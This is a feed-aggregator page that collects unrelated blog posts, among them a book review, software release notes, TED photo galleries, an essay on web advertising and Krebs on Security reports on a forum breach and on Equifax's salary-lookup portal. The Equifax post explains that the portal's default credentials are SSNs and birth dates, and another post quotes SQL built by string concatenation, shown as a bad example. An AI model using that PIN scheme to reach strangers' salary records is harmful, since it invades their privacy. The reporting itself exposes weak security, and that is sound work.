Planet DebianRuss Allbery: Review: Sweep in Peace

Review: Sweep in Peace, by Ilona Andrews

Series: Innkeeper Chronicles #2
Publisher: NYLA
Copyright: 2015
ISBN: 1-943772-32-0
Format: Kindle
Pages: 302

This is the sequel to Clean Sweep. You could pick up the background as you go along, but the character relationships benefit from reading the series in order.

Dina's inn is doing a bit better, but it still desperately needs guests. That means she's not really in a position to say no when an Arbitrator shows up at her door and asks her to host a peace summit. Lucky for the Arbitrator, since every other inn on Earth did say no.

Nexus has been the site of a viciously bloody conflict between the vampires, the Hope-Crushing Horde, and the Merchants of Baha-char for years. All sides have despaired of finding any form of peace. The vampires and the Horde have both deeply entrenched themselves in a cycle of revenge. The Merchants have the most strategic position and an apparently unstoppable warrior. The situation is hopeless; by far the most likely outcome will be open warfare inside the inn, which would destroy its rating and probably Dina's future as an innkeeper. Dina will need all of her power and caution just to stop that; peace seems beyond any possibility, but thankfully isn't her problem. Maybe the Arbitrator can work some miracle if she can just keep everyone alive.

And well fed. Which is another problem. She has enough emergency money for the food, but somehow cook for forty people from four different species while keeping them all from killing each other? Not a chance. She's going to have to hire someone somehow, someone good, even though she can't afford to pay.

Sweep in Peace takes this series farther out of urban fantasy territory and farther into science fiction, and also ups the stakes (and the quality of the plot) a notch. We get three moderately interesting alien species with only slight trappings of fantasy, a wonderful alien chef who seems destined to become a regular in the series, and a legitimately tricky political situation. The politics and motives aren't going to win any awards for deep and subtle characterization, but that isn't what the book is going for. It's trying to throw enough challenges at Dina to let her best characteristics shine, and it does that rather well.

The inn continues to be wonderful, although I hope it becomes more of a character in its own right as the series continues. Dina's reshaping of it for guests, and her skill at figuring out the rooms her guests would enjoy, is my favorite part of these books. She cares about making rooms match the personality of her guests, and I love books that give the character a profession that matters to them even if it's unrelated to the plot. I do wish Andrews would find a few other ways for Dina to use her powers for combat beyond tentacles and burying people in floors, but that's mostly a quibble.

You should still not expect great literature. I guessed the big plot twist several chapters before it happened, and the resolution is, well, not how these sorts of political situations resolve in the real world. But there is not a stupid love affair, there are several interesting characters, and one of the recurring characters gets pretty solid and somewhat unusual characterization. And despite taking the plot in a more serious direction, Sweep in Peace retains its generally lighthearted tone and firm conviction in Dina's ability to handle just about anything. Also, the chef is wonderful.

One note: Partway into the book, I started getting that "oh, this is a crossover" feeling (well-honed by years of reading comic books). As near as I can tell from a bit of research, Andrews pulled in some of their characters from the Edge series. This was a bit awkward, in the "who are these people and why do they seem to have more backstory than any of the other supporting characters" cross-over sort of way, but the characters that were pulled in were rather intriguing. I might have to go read the Edge books now.

Anyway, if you liked Clean Sweep, this is better in pretty much every way. Recommended.

Followed by One Fell Sweep.

Rating: 8 out of 10

Planet DebianJunichi Uekawa: It's already November.

It's already November. Been reading up a bit on C++17 features and improvements. Nice.

,

Planet DebianAlexander Wirt: debconf mailinglists moved to lists.debian.org

Today I had the pleasure to move the debconf mailinglists to lists.debian.org. That means that the following mailinglists:

are now hosted on lists.debian.org. Please update any documentation or bookmarks you have.

Next step would be to join debconf again ;).

Planet DebianSteinar H. Gunderson: Trøndisk 2017 live stream

We're streaming live from Trøndisk 2017, first round of the Norwegian ultimate frisbee series, today from 0945 CET and throughout the day/weekend. It's an interesting first for Nageru in that it's sports, where everything happens much faster and there are more demands for overlay graphics (I've made a bunch of CasparCG templates). I had hoped to get to use Narabu in this, but as the (unfinished) post series indicates, I simply had to prioritize other things. There's plenty of new things for us anyway, not the least that I'll be playing and not operating. :-)

Feel free to tune in to the live stream, although we don't have international stream reflectors. It's a fun sport with many nice properties. :-) There will be YouTube not too long after the day is over, too.

Edit: All games from Saturday and Sunday are now online; see this YouTube list. Most commentary is in Norwegian, although some games are in English. I was happy everything worked well, and the production crew did a great job (I was busy playing), but of course there's tons of small things we want to improve for next time.

Rondam RamblingsRacism is alive and well in America

If you needed more evidence that racism is alive and well in America (yeah, as if) look no further than a Louisiana judge's recent decision to deny a black man his right to an attorney because he didn't ask like a white person would. And then there's John Kelly, who was supposed to be the grown up in the room, saying that "the lack of an ability to compromise led to the Civil War."  That the

Planet DebianLouis-Philippe Véronneau: Migrating my website to Pelican

After too much time lying to myself, telling myself things like "I'll just add this neat feature I want on my blog next week", I've finally made the big jump, ditched django and migrated my website to Pelican.

I'm going to the Cambridge Mini-Debconf at the end of the month for the Debconf Videoteam Autumn sprint and I've taken the task of making daily sprint reports for the team. That in return means I have to publish my blog on Planet Debian. My old website not having feeds made this a little hard and this perfect storm gave me the energy to make the migration happen.

Anyway, django was fun. Building a (crappy) custom blogging engine with it taught me some rough basics, but honestly I don't know why I ever thought it was a good idea.

Don't get me wrong: django is great and should definitely be used for large and complicated websites. My blog just ain't one.

Migrating to Pelican was pretty easy since it also uses Jinja2 templates and generates content from Mardown. The hardest part was actually bending it to replicate the weird and specific behavior I wanted it to have.

So yeah, woooo, I migrated to Pelican. Who cares, right? Well, if you are amongst the very, very few people who read the blog posts I mainly write for myself, you'll be please to know that:

  • Tags are now implemented
  • You can subscribe to a wide array of ATOM feeds to follow my blog

Here's a bonus picture of a Pelican from Wikimedia, just for the sake of it:

A pelican

TEDWhen two take the stage: Images from TEDWomen 2017 duets

If you think a TED Talk is always a solo star turn, think again. Every year at TEDWomen, we feature a whole session devoted to talks given by two partners.  Whether they’re couples, collaborators, parent and kid, or best friends, the onstage chemistry is always fun to watch. In this photo gallery you may get the idea:

Friends and collaborators Tiffany Mugo and Siphumeze Khundayi are talking here about open-minded, joyful sexuality, inspired by African traditions with a modern twist. Photo: Ryan Lash / TED

Ples Felix, left, and Azim Khamisa, center, share their heartfelt thank-yous with the audience as they close their talk. Behind them on the screen is their third partner, Ples’ grandson Tony, who’ll join their work fighting youth violence as soon as he leaves prison next year. They speak at TEDWomen 2017. Photo: Ryan Lash / TED

Best friends Felice Belle and Jennifer Murphy crack each other up onstage at TEDWomen. Photo: Ryan Lash / TED

Joan Blades and John Gable seem to be putting into practice the idea they came to share: that we should all try to listen to one another better and honor each other’s perspectives. Photo: Ryan Lash / TED

After Jess Search, left, hosted a sparkling Session 5, she passed the baton to our conference co-host Pat Mitchell, who stepped in to handle some housekeeping notes to the audience. Photo: Ryan Lash / TED

During our Facebook Live chat with Justin Baldoni, host Manoush Zomorodi has a moment. We may all have had that same moment. Photo: Ryan Lash / TED


Planet Linux AustraliaOpenSTEM: This Week in HASS – term 4, week 5

Halfway through the last term of the year already! This week our youngest students consider museums as a place to learn about the past. Slightly older students are learning about the states and territories of Australia, as well as their representative birds and animals. Older students are in throes of their class election campaign, preparing […]

Planet DebianDirk Eddelbuettel: tint 0.0.4: Small enhancements

A maintenance release of the tint package arrived on CRAN earlier today. Its name expands from tint is not tufte as the package offers a fresher take on the Tufte-style for html and pdf presentations.

A screenshot of the pdf variant is below.

This release brings some minor enhancements and polish, mostly learned from having done the related pinp (two-column vignette in the PNAS style) and linl (LaTeX letter) RMarkdown-wrapper packages; see below for details from the NEWS.Rd file.

Changes in tint version 0.0.4 (2017-11-02)

  • Skeleton files are also installed as vignettes (#20).

  • A reference to the Tufte source file now points to tint (Ben Marwick in #19, later extended to other Rmd files).

  • Several spelling and grammar errors were corrected too (#13 and #16 by R. Mark Sharp and Matthew Henderson)

Courtesy of CRANberries, there is a comparison to the previous release. More information is on the tint page.

For questions or comments use the issue tracker off the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

,

Krebs on Security2nd Breach at Verticalscope Impacts Millions

For the second time in as many years, hackers have compromised Verticalscope.com, a Canadian company that manages hundreds of popular Web discussion forums totaling more than 45 million user accounts. Evidence of the breach was discovered just before someone began using that illicit access as a commercial for a new paid search service that indexes consumer information exposed in corporate data breaches.

Toronto-based Verticalscope runs a network of sites that cater to automotive, pets, sports and technology markets. Verticalscope acknowledged in June 2016 that a hacking incident led to the siphoning of 45 million user accounts. Now, it appears the company may have been hit again, this time in a breach involving at least 2.7 million user accounts.

On Thursday, KrebsOnSecurity was contacted by Alex Holden, a security researcher and founder of Hold Security. Holden saw evidence of hackers selling access to Verticalscope.com and to a host of other sites operated by the company.

Holden said at first he suspected someone was merely trying to resell data stolen in the 2016 breach. But that was before he contacted one of the hackers selling the data and was given screen shots indicating that Verticalscope.com and several other properties were in fact compromised with a backdoor known as a “Web shell.”

A backdoor “Web shell” discovered on Verticalscope.com this week.

With a Web shell installed on a site, anyone can remotely administer the site, upload and delete content at will, or dump entire databases of information — such as usernames, passwords, email addresses and Internet addresses associated with each account.

Holden said the intruders obfuscated certain details in the screenshots that gave away exactly where the Web shells were hidden on Verticalscope.com, but that they forgot to blur out a few critical details — allowing him to locate at least two backdoors on Veriticalscope’s Web site. He also was able to do the same with a second screen shot the hackers shared which showed a similar backdoor shell on Toyotanation.com, one of Verticalscope’s most-visited forums.

Reached for comment about the claims, Verticalscope said the company had detected an intrusion on six of its Web sites, including Toyotanation.com.

“The intrusion granted access to each individual website files,” reads a statement shared by Verticalscope. “Out of an abundance of caution, we have removed the file manager, expired all passwords on the 6 websites in question, added the malicious file pattern and attack vector to our detection tools, and taken additional steps to lock down access.”

Verticalscope said the other forums impacted included Jeepforum.com — the company’s second most-popular site; and watchuseek.com, a forum for wristwatch enthusiasts.

Verticalscope admitted a breach in 2016 after their forum users’ data was outed in a blog post on Leakedsource.com, a now-defunct service that sold access to username and password details stolen in some of history’s largest data breaches.

An Internet search on one of the compromised Verticalscope domains leads to a series of now-deleted Pastebin posts suggesting that the individual(s) responsible for this hack may be trying to use it to advertise a legally dicey new online service called LuiDB.

Similar to Leakedsource, LuiDB allows registered users to search for account details associated with any data element compromised in a breach — such as login, password, email, first/last name and Internet address. The first search is free, but viewing results requires purchasing a subscription for between $5 and $400 in Bitcoin.

The various subscription packages sold by LuiDB, payable in Bitcoin.

People who re-use passwords across multiple Web sites tend to be those hardest-hit by these breaches, and by these dodgy password lookup services. It may not seem like a big deal if someone chooses to re-use the same password across a range of sites that don’t ask for or store your personal data, such as discussion forums. The problem is that this encourages poor password habits, and for many folks this eventually results in using that forum password at more important sites that do store sensitive data.

In practice, there’s no reason people should ever re-use the same password. Password managers can help users pick and remember unique, strong passwords for all sites that require a login; all the user needs to do is remember a single “master password” to unlock all the others. Old schoolers like Yours Truly tend to stick to local password managers like Keepass (or even PwdSafe), although many folks I admire in the security industry rely heavily on cloud-based password managers like LastPass and Dashlane.

While few online discussion forums offer two-factor or multi-factor authentication (requiring you to log in using a password and a one-time code, e.g.), a great many services do offer this very effective security measure. Check out twofactorauth.org to see if there are online services you use that could be furthered hardened by turning on two-factor authentication.

CryptogramFriday Squid Blogging: Squid Product Recall

Lidl is recalling two of its packaged squid products because of the presence of struvite salt crystals.

The danger is unclear. The article says that struvite crystals "may be mistaken as glass fragments," which isn't actually dangerous. It also says: "As these salt crystals may cause injury, the product should not be consumed." Maybe it's the intestinal tract that mistakes the crystals for glass.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

CryptogramFraud Detection in Pokémon Go

I play Pokémon Go. (There, I've admitted it.) One of the interesting aspects of the game I've been watching is how the game's publisher, Niantic, deals with cheaters.

There are three basic types of cheating in Pokémon Go. The first is botting, where a computer plays the game instead of a person. The second is spoofing, which is faking GPS to convince the game that you're somewhere you're not. These two cheats are often used together -- and you see the results in the many high-level accounts for sale on the Internet. The third type of cheating is the use of third-party apps like trackers to get extra information about the game.

None of this would matter if everyone played independently. The only reason any player cares about whether other players are cheating is that there is a group aspect of the game: gym battling. Everyone's enjoyment of that part of the game is affected by cheaters who can pretend to be where they're not, especially if they have lots of powerful Pokémon that they collected effortlessly.

Niantic has been trying to deal with this problem since the game debuted, mostly by banning accounts when it detects cheating. Its initial strategy was basic -- algorithmically detecting impossibly fast travel between physical locations or super-human amounts of playing, and then banning those accounts -- with limited success. The limiting factor in all of this is false positives. While Niantic wants to stop cheating, it doesn't want to block or limit any legitimate players. This makes it a very difficult problem, and contributes to the balance in the attacker/defender arms race.

Recently, Niantic implemented two new anti-cheating measures. The first is machine learning to detect cheaters. About this, we know little. The second is to limit the functionality of cheating accounts rather than ban them outright, making it harder for cheaters to know when they've been discovered.

"This is may very well be the beginning of Niantic's machine learning approach to active bot countering," user Dronpes writes on The Silph Road subreddit. "If the parameters for a shadowban are constantly adjusted server-side, as they can now easily be, then Niantic's machine learning engineers can train their detection (classification) algorithms in ever-improving, ever more aggressive ways, and botters will constantly be forced to re-evaluate what factors may be triggering the detection."

One of the expected future features in the game is trading. Creating a market for rare or powerful Pokémon would add a huge additional financial incentive to cheat. Unless Niantic can effectively prevent botting and spoofing, it's unlikely to implement that feature.

Cheating detection in virtual reality games is going to be a constant problem as these games become more popular, especially if there are ways to monetize the results of cheating. This means that cheater detection will continue to be a critical component of these games' success. Anything Niantic learns in Pokémon Go will be useful in whatever games come next.

Mystic, level 39 -- if you must know.

And, yes, I know the game tracks works by tracking your location. I'm all right with that. As I repeatedly say, Internet privacy is all about trade-offs.

Worse Than FailureError'd: Going for the Gold!

"Starting from one star, I'm almost at that gold five-star rating," writes Sam K.

 

"The octopus in the exhibit was a no show, but hey, at least I have a desktop to play around in," wrote Steve W.

 

Mike N. "Thanks Walgreens! I'm looking forward to spending my $[mi_reward]."

 

"Salesforce Apex Code deployment is such a joy," Bruce C., "Turns out my 9 components are 11 in Salesforce's eye - maybe they're counting in octal?"

 

"That's so true of PayPal, those [object:Object] fees will get you every time," wrote Brian K.

 

Shahim M. writes, "Yeah. I'm going to have to pass on that offer to save Rs. 0.68."

 

[Advertisement] Atalasoft’s imaging SDKs come with APIs & pre-built controls for web viewing, browser scanning, annotating, & OCR/barcode capture. Try it for 30 days with included support.

Don MartiWorld's last web advertising optimist tells all!

It's getting hard to explain still taking web advertising seriously in 2017, so I had better write something down. To start with, what is web advertising exactly?

Doesn't sound good so far. Maybe I'm a fool to be the last advertising optimist on the web. (See, for example: me, running my mouth about how great advertising is, to an audience of web publishers looking to write it off and move on.)

From the point of view of users, web advertising has failed to hold up its end of the signal for attention bargain, and substituted nasty attempts at manipulation. No wonder people block it.

From the point of view of clients, web advertising has failed to meet the basic honesty standards that any third-rate print publication can. And every web advertising company is calling fraud an industry-wide problem, which is what business people say when they really don't care about fixing something.

From the point of view of publishers, web advertising has failed to show the proverbial money. It's stuck at a fraction of the value per user minute that print can pull in, which means that as print goes away, so does the ad money.

Web advertising has failed the audience, the advertisers, and the people who make ad-supported news and cultural works. Maybe I should go be a fan of something else, like securitizing bug trackers or something. Web advertising just is that annoying, creepy thing that browsers are competing to block in different, creative, ways. [T]he online ad sector transitioned from a creative-led industry to a data and algorithms-led industry, wrote venture capitalist Adam Fisher, who is understandably proud of not investing in it.

Some new companies, such as Scroll, are all about making it easier for readers to buy out of seeing advertising. Advertising is to web sites as annoying "UNREGISTERED SHAREWARE" banners and dialogs are to computer software.

On Twitter, what does the "verified" blue checkmark get you? A ticket out of Twitter's world-classedly crappy advertising.

At least search advertising is working. Bob Hoffman calls it a "much better yellow pages." But any kind of brand-building, signal-carrying advertising, where most of the money is? Not there. Ever notice how much of the evidence for "data-driven" advertising is anecdotal?

Is anyone speaking up for web advertising? Not really. Where advertising still has a policy voice, it's a bunch of cut-and-paste anti-privacy advocacy that sounds like what you might get from eighth grade Libertarians, or from people who are so bad at math they assume that it's humanly possible to read and understand Terms of Service from 70 third-party trackers on one web page. The Interactive Advertising Bureau has become the voice of schemes that are a few pages of fine print away from malware and spam. By expanding to include members whose interests oppose those of legit publishers and advertisers, and defending every creepy user privacy violation scheme that the worst members come up with, an organization that could have been a voice for pro-advertising policy positions has made itself meaningless. Right now the IAB is about as relevant to web advertising policy as the Tetraethyl Lead Industry Association is relevant to transportation policy.

Bad news all the way around, right? But some of us have been somewhere like this before.

Remember the operating systems market in the late 1990s?

In 1998, Unix was on the way out.

All the right-thinking people were going Windows NT.

Yes, even Tim O'Reilly, who built version 1.0 of his company on Unix, had apparently written it off. The spring 1998 O’Reilly catalog had all Windows books on the cover, and the Unix stuff was in back. O’Reilly and Associates was promoting the company’s first and only shrink-wrap software, a web server for Windows NT.

And why not? Bickering Unix vendors were doing short-sighted stunts such as removing the compiler from the basic version, and charging hard-to-justify prices for workstations and servers that users could beat with a properly-configured PC. Who needed it?

We know what happened shortly after that. The Unix scene Did anyone ever make a "Lumascape"-like chart of the Unix vendors? faded away and, with enough drama to make for good IT news coverage but not enough to interfere with successful efforts to fix the Year 2000 Problem, the Linux scene replaced it.

The good news is that people employed in the Unix scene were able to move, in most cases happily, to the Linux scene. (Which is big enough that it has become the OS for the "IoT", "Saas" and "Cloud" businesses, and a majority of "mobile" by units, but not of course profits) So maybe my experience living through the end of Unix is why I'm still a web advertising optimist. The economic niche for advertising hasn't gone away. Just as software had to get some important licensing and API decisions right in order to make the Linux boom happen, web advertising is so close to getting it right, too. Now that we know the basics...

  1. People have norms about data sharing. Browsers must reflect those norms or get replaced.

  2. People enjoy ad-supported news, cultural works, and services, and will tolerate ads that hold up their end of the bargain.

  3. People don't like to micromanage their attention and privacy, and expect companies they deal with to cover the costs of coming into compliance with norms.

...the next steps are coming together pretty quickly.

Forget iPhone X–Apple's Best Product Is Its Privacy Stance

Five Books to Make You Less Stupid About the Civil War

The Atlantic Made $0.004 From Russian Ads

Coders of the world, unite: can Silicon Valley workers curb the power of Big Tech?

Silicon Valley helped Russia sway the US election. So now what? | Emily Bell

Direct ad buys are back in fashion as programmatic declines

Why we need a 21st-century Martin Luther to challenge the church of tech

Firefox takes a bite out of the canvas ‘super cookie’

We need to think more about advertising

Three ways of re-creating Firefox Focus behavior on Firefox desktop

Need a super, super secure way to access The New York Times site? Now you can try it via a Tor Browser

Twitter urged firms to delete data during 2016 campaign

‘The art of buying crap’: The Guardian wants publishers to unite to clean up programmatic

The advertising industry has been living a lie

Consent to use personal data has no value unless one prevents all data leakage

Civil, the blockchain-based journalism marketplace, is building its first batch of publications

What Facebook Did to American Democracy

The Great Ad Tech Cleanup

How Silicon Valley’s Dirty Tricks Helped Stall Broadband Privacy in California

When the Facebook Traffic Goes Away

This new Twitter account hunts for bots that push political opinions

Publishers are struggling to monetize the ‘Trump bump’ as advertisers avoid controversial content

Med Men: where the parody lies

,

Krebs on SecurityEquifax Reopens Salary Lookup Service

Equifax has re-opened a Web site that lets anyone look up the salary history of a large portion of the American workforce using little more than a person’s Social Security number and their date of birth. The big-three credit bureau took the site down just hours after I wrote about it on Oct. 8, and began restoring the site eight days later saying it had added unspecified “security enhancements.”

The Work Number, Equifax’s salary and employment history portal.

At issue is a service provided by Equifax’s TALX division called The Work Number. The service is designed to provide automated employment and income verification for prospective employers, and tens of thousands of companies report employee salary data to it. The Work Number also allows anyone whose employer uses the service to provide proof of their income when purchasing a home or applying for a loan.

What’s needed to access your salary and employment history? Go here, and enter the employer name or employer code. After that, it asks for a “user ID.” This might sound like privileged information, but in most cases this is just the employees’s Social Security number (or a portion of it).

At the next step, the site asks visitors to “enter your PIN,” short for Personal Identification Number. However, in the vast majority of cases this appears to be little more than someone’s eight-digit date of birth. The formats differ by employer, but it’s usually either yyyy/mm/dd or mm/dd/yyyy, without the slashes.

Successful validation to the system produces two sets of data: An employee’s salary and employment history going back at least a decade, and a report listing all of the entities (ostensibly, the aforementioned “credentialed verifiers”) that have previously requested and viewed this information.

In a story in the financial industry publication National Mortgage News, Equifax said:  “As access to the employee portal is restored, individuals must be re-authenticated and establish a unique PIN. Therefore, the data exposed in the cyber incident will not be sufficient to access The Work Number.”

The publication said Equifax declined to answer questions about whether the timing of the portal maintenance or the decision to add new security features were in response to the original Oct. 8 report here, quoting an Equifax spokesman saying the company opted to move up and expand a planned service outage.

“At that time, we also decided to accelerate the implementation of select security enhancements to our platforms which extended the service outage timeframe,” the spokesman said.

I walked through the newer, allegedly more secure portal with a friend and source who worked at a major firm that used The Work Number at some point previously, and at first we couldn’t figure out how to enter his default PIN. A quick search for his employer’s name and “The Work Number” turned up a PDF with instructions stating that the PIN consisted of the last two digits of the employee’s birth year, and the fourth and fifth digit of their SSN.

Part of the new and improved security at The Work Number.

After passing that screen, the only “security enhancements” I saw that my source encountered was a prompt to enter his full name, date of birth, Social Security number, address, phone number and email, followed by the usual retinue of four multiple-guess “knowledge-based authentication” (KBA) questions. I’ve long been a critic of these KBA questions, because the answers usually are available using sites like Zillow and Spokeo, to say nothing of social networking profiles.

Fortunately, you can reduce the likelihood that an acquaintance, co-worker, stalker or anyone else can glean your salary history by claiming your own account, changing the PIN and selecting a half-dozen security questions and answers. As always, it’s best not to answer these questions truthfully, but to input answers that only you will know and that can’t be found using social networking sites or other public data sources.

I used to think that if you had a security freeze on your credit file at a credit bureau that the bureau would then be unable to ask these KBA questions. I’ve recently worked with several sources who had freezes on their files and yet were still asked these KBA questions. Those individuals may not have all been approved to continue whatever transaction was in progress after answering those questions, but in most cases it shocks folks who have freezes when they even get asked those KBA questions.

However, it seems that each of the cases I’ve seen in which the person had a freeze on their credit file, the applicant was asked only non-financial questions. In other words, they were given questions that one did not necessarily need access to one’s credit card or mortgage statements to answer successfully — such as the names of previous streets resided on or the names of lenders used in the past.

What’s interesting is that these types of questions tend to be easier to answer than, say, ‘What was the amount of your most recent car loan payment?’ That suggests that ID thieves could find people with credit freezes an easier target of services like this one because they face far easier KBA questions after they provide all of the target’s static information (DOB, SSN, etc).

If that sounds ironic or sad, remember that we’re talking about a company whose breach more severely impacted consumers who paid Equifax whatever fees the company is allowed to charge under state laws to freeze the consumer’s credit file.

We all sort of assumed this was the case when Equifax initially disclosed on Sept. 7 that the breach resulted in the theft of SSNs and other data on 143+million people, as well as some 209,000 credit and debit card numbers. But in written notifications recently mailed to victims of the breach, Equifax made it crystal clear that their credit card data was stolen because they once used it at Equifax to request a credit freeze or copy of their credit report.

Part of the notice Equifax mailed this week to a U.S. breach victim.

Does your current or former employer share your salary data with Equifax? If so, were you able to access your salary history via The Work Number site? Sound off in the comments below about any “security enhancements” you encountered along the way.

If you’re still unsure what you should be doing in the wake of the breach at Equifax, see this Q&A.

Worse Than FailureCodeSOD: Switching the Search

We return to Virginia N’s refactoring efforts (previously: here, and here).

This code is elegant in its stupidity, combining two anti-patterns in one glorious, “No, don’t do that, whyyyyyyyyyy!”. To wit, the for-switch, and the “build SQL statements through string concatenation”:

for (int i = 0; i < 16; i++)
{

    StringBuilder commandText = new StringBuilder();
    command = new OracleCommand();
    switch (i)
    {
        case 0:
                commandText.Append(searchbuyer);
                parameter = new OracleParameter(":BUYER_DEP", OracleDbType.Char, 2);
                parameter.Value = depBuyer;
                command.Parameters.Add(parameter);
                break;
        case 1:
                commandText.Append(searchStock);
                break;
        case 2:
                commandText.Append(searchArbo1+"E"+searchArbo2);

                break;
        case 3:
                commandText.Append(searchArbo1+"V"+searchArbo2);
                break;
        case 4:
                commandText.Append(searchArbo1+"M"+searchArbo2);
                        break;
        case 5:
                commandText.Append(searchArbo1+"P"+searchArbo2);
                        break;
        case 6:
                commandText.Append(searchArbo1+"S"+searchArbo2);
                        break;
        case 7:
                commandText.Append(searchArbo1+"O"+searchArbo2);
                break;
        case 8:
                commandText.Append(searchArbo1+"T"+searchArbo2);
                break;
        case 9:
                commandText.Append(searchArbo1+"A"+searchArbo2);
                break;
        case 10:
                commandText.Append(searchArbo1+"I"+searchArbo2);
                break;
        case 11:
                commandText.Append(searchDemandeur);
                break;
        case 12:
                commandText.Append(searchDoc);
                break;
        case 13:
                commandText.Append(searchForm);
                break;
        case 14:
                commandText.Append(searchCertif);
                break;
        case 15:
                commandText.Append(searchFormV);
                break;
    }
    //… use the query
}

And for bonus points, this takes a round trip to the database for every iteration of the loop, for 16 hits per search. EVMPSOTAI, indeed.

[Advertisement] Universal Package Manager - ProGet easily integrates with your favorite Continuous Integration and Build Tools, acting as the central hub to all your essential components. Learn more today!

CryptogramHeart Size: Yet Another Biometric

Turns out that heart size doesn't change throughout your adult life, and you can use low-level Doppler radar to scan the size -- even at a distance -- as a biometric.

Research paper (to be available soon).

Rondam RamblingsA candid glimpse inside the incredibly twisted mind of Donald Trump Jr.

Donald Trump Jr. inadvertently (I'm pretty sure) gave us a glimpse of his true face yesterday when he tweeted: I'm going to take half of Chloe's candy tonight [and] give it to some kid who sat at home. It's never to [sic] early to teach her about socialism. Let's think about exactly what the lesson is supposed to be here: trick-or-treating is OK, a shining example of what capitalism is supposed

TEDGallery: Just about to open doors at TEDWomen 2017 at the Orpheum Theater

Rehearsal days involve a lot of laptop time as our video and stage teams fine-tune the details to create the amazing experience that will be TEDWomen 2017 in New Orleans. Photo: Ryan Lash / TED

We’re about to open the doors for the audience to join TEDWomen in New Orleans — three days of powerful talks from women and men that take on the issues breaking now and share soul-deep ideas for creating better lives going forward. TEDWomen is happening in an astonishing theater, new to us and freshly renovated but nearly a century old. In itself it’s a story of renewal and rejuvenation: Flooded during Katrina, the theater was meticulously restored and reopened in 2015. During our rehearsal and setup says, we’re pretty unabashedly taking hundreds of pictures of this glorious interior — which is about to rock with the sounds of the Lake Area Girls Choir backing the Broadway star Deborah Cox.

Photographer Ryan Lash captures this amazing theater from three angles — from the top of the house, from the first balcony, and a reverse shot from backstage capturing yet another impromptu crew meeting on the red circle.

The speaker’s-eye view from the red circle, looking out at the audience seating at the Orpheum Theater in New Orleans. Photo: Ryan Lash / TED

Follow news from TEDWomen in a bunch of ways — here on the TED Blog, on @TEDTalks, on the hashtag #tedwomen. Tune in for some amazing Facebook Live interviews with four speakers throughout Thursday and Friday. And of course, look for talks from TEDWomen that will post on TED.com throughout the year to come!


,

CryptogramGoogle Login Security for High-Risk Users

Google has a new login service for high-risk users. It's good, but unforgiving.

Logging in from a desktop will require a special USB key, while accessing your data from a mobile device will similarly require a Bluetooth dongle. All non-Google services and apps will be exiled from reaching into your Gmail or Google Drive. Google's malware scanners will use a more intensive process to quarantine and analyze incoming documents. And if you forget your password, or lose your hardware login keys, you'll have to jump through more hoops than ever to regain access, the better to foil any intruders who would abuse that process to circumvent all of Google's other safeguards.

It's called Advanced Protection.

Rondam RamblingsRandom tweet-length thought of the day

Why is it that when a Muslim kills 8 people it's the Democrats' fault for supporting diversity visas, but when a white man kills 59 people it's not the Republicans' fault for opposing gun control?

Worse Than FailureCodeSOD: An Academic Consideration

Becky is not a programmer, but a physicist. She works in academia, alongside other scientists. Modern science generally requires some sort of heavy computation, which means scientists write code. It’s often not very good code, but that’s just the nature of the beast. The code exists to provide an analysis, not to be deployed as an app to the masses.

Most of the time. A few civil engineers were working on a brand new Android app for traffic analysis, with plans to distribute it. Unfortunately, they had some problems, and wanted more experienced eyes. Becky set aside the Fortran77 she was working on to trace through their Java code, and found this:

public class MainActivity extends Activity {
    private static double GpsLon = 0.00;
    public double getGpsLon() { return GpsLon; }
    public void setGpsLon(double value) { GpsLon = value; }
    private static boolean saveComLogeFile = true;
    public boolean getSaveComLogeFile() {return saveComLogeFile;}
    public void setSaveComLogeFile(boolean saveComLogeFile) {this.saveComLogeFile = saveComLogeFile;}
    // more than 70 similar static variables with non-static getters and setters
}

public class GpsWlan implements Runnable
{
    static MainActivity ma = new MainActivity();
    @Override
    public void run()
    {
        ma.setGpsLon(1.234);
    }
}

At this point in the article, I’d normally explain to you what this code is trying to do, and why it’s bad. Honestly though, I can’t even answer the first question. MainActivity is a megaclass of properties- and those properties are all static. That’s a fine approach for configuration settings, but you usually pair it with static getters and setters.

But the place where they actually set these variables is the really weird part of this. By implementing Runnable, they’re implying that GpsWlan should be run as its own thread- great if you’re doing heavy I/O or something, but… for setting a property? A static property? With no syncing or locking? Sure, they are setting it to a literal value, so we apparently don’t need to be too worried about race conditions, but… why?

Well, there isn’t a reason. Becky explains the process used to develop this code: “Here, Researcher N learns to program by asking Researcher N–1 for their code, learning from it and tweaking what they had.” I'm going to add a little correction: they're not learning anything from the code. This is cargo cult programming- the code they borrowed did this, so their code does it too.

[Advertisement] Manage IT infrastructure as code across all environments with Puppet. Puppet Enterprise now offers more control and insight, with role-based access control, activity logging and all-new Puppet Apps. Start your free trial today!

Don MartiAlways run a shell script from the directory it lives in

Always run a shell script in the directory in which it appears, and change back to the directory you were in when you ran it even if it fails.

trap popd EXIT
pushd $PWD
cd $(dirname "$0")

Works for me in bash. The pushd command does a cd but saves the directory where you were on a stack, and popd pops the saved directory from the stack. The trap ... EXIT is a bash way to run something when the script exits, no matter how, and dirname "$0" is the directory name of the script.

(Taken from the deploy.sh script that rebuilds and deploys this blog, so if you can read this, it works.)

Sociological ImagesWhy Witchcraft Appeals to Marginalized Groups

Originally Posted at There’s Research On That! 

Photo by Tom Lee, Flickr CC

If you like Halloween, you know that witches are a popular costume choice and decoration this time of year. But the history of witches involves much more than bubbling cauldrons and flying broomsticks. Social science shows us that witchcraft has a long history of empowering marginalized groups, like women and sexual minorities, who question more traditional religious practices.

While popular images of witches often focus on magic spells, brooms, and pointed hats, witchcraft and other forms of neo-paganism have historically been used by women to push back against male-dominated religions. More traditional, hierarchical interpretations of religions like Christianity and Islam often place women in a subordinate role to men, and research finds that many women are drawn to witchcraft and other alternative spiritualities because they emphasize female empowerment, embodied rituals, and sexual freedom.

People who practice witchcraft and neo-paganism typically see sexuality and gender as key sites for social transformation and personal healing, pushing back against the Christian idea that sex and bodies are sinful. Since neo-paganism values sexual freedom and sexual diversity, LGBTQ folks and people practicing polyamory often feel a sense of belonging that they don’t find in other religious spaces.

This has also been true for young adults. In general, young adults practice religion and spirituality differently than do older generations. For example, millennials are the least likely to participate in traditional religious institutions or identify with one single religious belief system, but many still desire some combination of spirituality and community. The increase in portrayals of witchcraft and other neo-pagan religions in popular media has exposed younger generations to these communities, and research finds that teens are more often drawn to these alternative spiritual practices as a means of self-discovery and community, rather than the promise of magical powers.

